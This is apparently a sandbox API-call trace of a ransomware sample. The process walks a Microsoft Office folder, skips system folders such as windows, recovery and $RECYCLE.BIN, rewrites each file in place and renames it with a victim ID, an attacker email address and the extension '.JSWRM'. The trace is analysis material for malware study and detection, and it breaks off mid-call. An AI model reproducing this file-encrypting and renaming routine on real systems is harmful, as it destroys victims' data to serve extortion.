0x0 [0143.619] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x31c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x31c0, lpOverlapped=0x0) returned 1 [0143.619] CloseHandle (hObject=0x238) returned 1 [0143.619] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WEBHOME.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\webhome.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WEBHOME.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\webhome.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.620] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23572815, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23572815, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23572815, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x34a0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="WEBLINK.POC", cAlternateFileName="")) returned 1 [0143.620] lstrcmpiW (lpString1="WEBLINK.POC", lpString2=".") returned 1 [0143.620] lstrcmpiW (lpString1="WEBLINK.POC", lpString2="..") returned 1 [0143.620] lstrcmpiW (lpString1="WEBLINK.POC", lpString2="...") returned 1 [0143.620] lstrcmpiW (lpString1="WEBLINK.POC", lpString2="windows") returned -1 [0143.620] lstrcmpiW (lpString1="WEBLINK.POC", lpString2="recovery") returned 1 [0143.620] lstrcmpiW (lpString1="WEBLINK.POC", lpString2="perflogs") returned 1 [0143.620] lstrcmpiW (lpString1="WEBLINK.POC", lpString2="documents and settings") returned 1 [0143.620] lstrcmpiW (lpString1="WEBLINK.POC", lpString2="$RECYCLE.BIN") returned 1 [0143.620] lstrcmpiW (lpString1="WEBLINK.POC", lpString2="system volume information") returned 1 [0143.620] lstrcmpiW (lpString1="WEBLINK.POC", lpString2="msocache") returned 1 [0143.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEBLINK.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEBLINK.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WEBLINK.POC", lpUsedDefaultChar=0x0) returned 11 [0143.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEBLINK.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEBLINK.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WEBLINK.POC", lpUsedDefaultChar=0x0) returned 11 [0143.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.621] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WEBLINK.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\weblink.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.621] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13472) returned 1 [0143.622] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.622] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x34a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x34a0, lpOverlapped=0x0) returned 1 [0143.626] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.626] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x34a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x34a0, lpOverlapped=0x0) returned 1 [0143.626] CloseHandle (hObject=0x238) returned 1 [0143.626] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WEBLINK.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\weblink.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WEBLINK.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\weblink.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.627] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2354c5c9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2354c5c9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23572815, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xfeb9a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="WEBPAGE.DPV", cAlternateFileName="")) returned 1 [0143.627] lstrcmpiW (lpString1="WEBPAGE.DPV", lpString2=".") returned 1 [0143.627] lstrcmpiW (lpString1="WEBPAGE.DPV", lpString2="..") returned 1 [0143.627] lstrcmpiW (lpString1="WEBPAGE.DPV", lpString2="...") returned 1 [0143.628] lstrcmpiW (lpString1="WEBPAGE.DPV", lpString2="windows") returned -1 [0143.628] lstrcmpiW (lpString1="WEBPAGE.DPV", lpString2="recovery") returned 1 [0143.628] lstrcmpiW (lpString1="WEBPAGE.DPV", lpString2="perflogs") returned 1 [0143.628] lstrcmpiW (lpString1="WEBPAGE.DPV", lpString2="documents and settings") returned 1 [0143.628] lstrcmpiW (lpString1="WEBPAGE.DPV", lpString2="$RECYCLE.BIN") returned 1 [0143.628] lstrcmpiW (lpString1="WEBPAGE.DPV", lpString2="system volume information") returned 1 [0143.628] lstrcmpiW (lpString1="WEBPAGE.DPV", lpString2="msocache") returned 1 [0143.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEBPAGE.DPV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEBPAGE.DPV", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WEBPAGE.DPV", lpUsedDefaultChar=0x0) returned 11 [0143.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEBPAGE.DPV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEBPAGE.DPV", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WEBPAGE.DPV", lpUsedDefaultChar=0x0) returned 11 [0143.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.628] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WEBPAGE.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\webpage.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.629] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1043354) returned 1 [0143.629] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.629] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0143.642] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.642] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0143.643] CloseHandle (hObject=0x238) returned 1 [0143.643] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WEBPAGE.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\webpage.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WEBPAGE.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\webpage.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.644] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23572815, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23572815, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23572815, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3d6a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="WEBPAGE.XML", cAlternateFileName="")) returned 1 [0143.644] lstrcmpiW (lpString1="WEBPAGE.XML", lpString2=".") returned 1 [0143.644] lstrcmpiW (lpString1="WEBPAGE.XML", lpString2="..") returned 1 [0143.644] lstrcmpiW (lpString1="WEBPAGE.XML", lpString2="...") returned 1 [0143.644] lstrcmpiW (lpString1="WEBPAGE.XML", lpString2="windows") returned -1 [0143.645] lstrcmpiW (lpString1="WEBPAGE.XML", lpString2="recovery") returned 1 [0143.645] lstrcmpiW (lpString1="WEBPAGE.XML", lpString2="perflogs") returned 1 [0143.645] lstrcmpiW (lpString1="WEBPAGE.XML", lpString2="documents and settings") returned 1 [0143.645] lstrcmpiW (lpString1="WEBPAGE.XML", lpString2="$RECYCLE.BIN") returned 1 [0143.645] lstrcmpiW (lpString1="WEBPAGE.XML", lpString2="system volume information") returned 1 [0143.645] lstrcmpiW (lpString1="WEBPAGE.XML", lpString2="msocache") returned 1 [0143.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEBPAGE.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEBPAGE.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WEBPAGE.XML", lpUsedDefaultChar=0x0) returned 11 [0143.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEBPAGE.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEBPAGE.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WEBPAGE.XML", lpUsedDefaultChar=0x0) returned 11 [0143.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.645] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WEBPAGE.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\webpage.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.646] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15722) returned 1 [0143.646] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.646] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x3d60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x3d60, lpOverlapped=0x0) returned 1 [0143.649] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.649] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x3d60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x3d60, lpOverlapped=0x0) returned 1 [0143.649] CloseHandle (hObject=0x238) returned 1 [0143.649] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WEBPAGE.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\webpage.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WEBPAGE.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\webpage.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.650] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2354c5c9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2354c5c9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23572815, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xba14, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="WITHCOMP.DPV", cAlternateFileName="")) returned 1 [0143.650] lstrcmpiW (lpString1="WITHCOMP.DPV", lpString2=".") returned 1 [0143.650] lstrcmpiW (lpString1="WITHCOMP.DPV", lpString2="..") returned 1 [0143.650] lstrcmpiW (lpString1="WITHCOMP.DPV", lpString2="...") returned 1 [0143.650] lstrcmpiW (lpString1="WITHCOMP.DPV", lpString2="windows") returned 1 [0143.650] lstrcmpiW (lpString1="WITHCOMP.DPV", lpString2="recovery") returned 1 [0143.650] lstrcmpiW (lpString1="WITHCOMP.DPV", lpString2="perflogs") returned 1 [0143.650] lstrcmpiW (lpString1="WITHCOMP.DPV", lpString2="documents and settings") returned 1 [0143.650] lstrcmpiW (lpString1="WITHCOMP.DPV", lpString2="$RECYCLE.BIN") returned 1 [0143.650] lstrcmpiW (lpString1="WITHCOMP.DPV", lpString2="system volume information") returned 1 [0143.650] lstrcmpiW (lpString1="WITHCOMP.DPV", lpString2="msocache") returned 1 [0143.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WITHCOMP.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WITHCOMP.DPV", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WITHCOMP.DPV", lpUsedDefaultChar=0x0) returned 12 [0143.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WITHCOMP.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WITHCOMP.DPV", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WITHCOMP.DPV", lpUsedDefaultChar=0x0) returned 12 [0143.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.651] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WITHCOMP.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\withcomp.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.651] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=47636) returned 1 [0143.652] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.652] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xba10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xba10, lpOverlapped=0x0) returned 1 [0143.656] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.656] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xba10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xba10, lpOverlapped=0x0) returned 1 [0143.656] CloseHandle (hObject=0x238) returned 1 [0143.656] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WITHCOMP.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\withcomp.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WITHCOMP.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\withcomp.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.657] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2354c5c9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2354c5c9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23572815, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1716, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="WITHCOMP.XML", cAlternateFileName="")) returned 1 [0143.657] lstrcmpiW (lpString1="WITHCOMP.XML", lpString2=".") returned 1 [0143.657] lstrcmpiW (lpString1="WITHCOMP.XML", lpString2="..") returned 1 [0143.657] lstrcmpiW (lpString1="WITHCOMP.XML", lpString2="...") returned 1 [0143.657] lstrcmpiW (lpString1="WITHCOMP.XML", lpString2="windows") returned 1 [0143.657] lstrcmpiW (lpString1="WITHCOMP.XML", lpString2="recovery") returned 1 [0143.657] lstrcmpiW (lpString1="WITHCOMP.XML", lpString2="perflogs") returned 1 [0143.657] lstrcmpiW (lpString1="WITHCOMP.XML", lpString2="documents and settings") returned 1 [0143.657] lstrcmpiW (lpString1="WITHCOMP.XML", lpString2="$RECYCLE.BIN") returned 1 [0143.657] lstrcmpiW (lpString1="WITHCOMP.XML", lpString2="system volume information") returned 1 [0143.658] lstrcmpiW (lpString1="WITHCOMP.XML", lpString2="msocache") returned 1 [0143.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WITHCOMP.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WITHCOMP.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WITHCOMP.XML", lpUsedDefaultChar=0x0) returned 12 [0143.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WITHCOMP.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WITHCOMP.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WITHCOMP.XML", lpUsedDefaultChar=0x0) returned 12 [0143.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.658] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WITHCOMP.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\withcomp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.658] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5910) returned 1 [0143.659] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.659] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1710, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1710, lpOverlapped=0x0) returned 1 [0143.660] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.660] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1710, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1710, lpOverlapped=0x0) returned 1 [0143.661] CloseHandle (hObject=0x238) returned 1 [0143.661] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WITHCOMP.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\withcomp.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WITHCOMP.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\withcomp.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.662] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2354c5c9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2354c5c9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23598a6d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x79e6b, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="WORDREP.DPV", cAlternateFileName="")) returned 1 [0143.662] lstrcmpiW (lpString1="WORDREP.DPV", lpString2=".") returned 1 [0143.662] lstrcmpiW (lpString1="WORDREP.DPV", lpString2="..") returned 1 [0143.662] lstrcmpiW (lpString1="WORDREP.DPV", lpString2="...") returned 1 [0143.662] lstrcmpiW (lpString1="WORDREP.DPV", lpString2="windows") returned 1 [0143.662] lstrcmpiW (lpString1="WORDREP.DPV", lpString2="recovery") returned 1 [0143.662] lstrcmpiW (lpString1="WORDREP.DPV", 